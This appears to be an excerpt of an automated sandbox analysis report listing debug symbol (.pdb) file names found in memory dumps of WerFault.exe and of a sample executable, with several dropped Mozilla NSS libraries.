Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: schannel.pdbtQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbT source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb9 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb, source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000020.00000003.462921326.00000000029F3000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb: source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdbi source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb. source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr
Source: Binary string: gdiplus.pdbp source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: version.pdb+ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdblX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbS source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb! source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb- source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbV source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb? source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb?A source: WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb< source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: shlwapi.pdb2 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb9 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbQ source: WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb$ source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb- source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb9 source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr
Source: Binary string: dwmapi.pdbxXiG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source: Binary string: propsys.pdb3 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb\ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbs source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbZXOG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbrQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbDX}G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbW source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.322487440.0000000002C3D000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.460504934.00000000029ED000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbvX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbh source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515291891.0000000005479000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb(XYGr source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbG source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdbw source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb] source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb@Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb] source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb<I source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbNX{G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb) source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb[ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb$Q.G source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdbZ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb& source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb( source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source: Binary string: wininet.pdb' source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb7 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
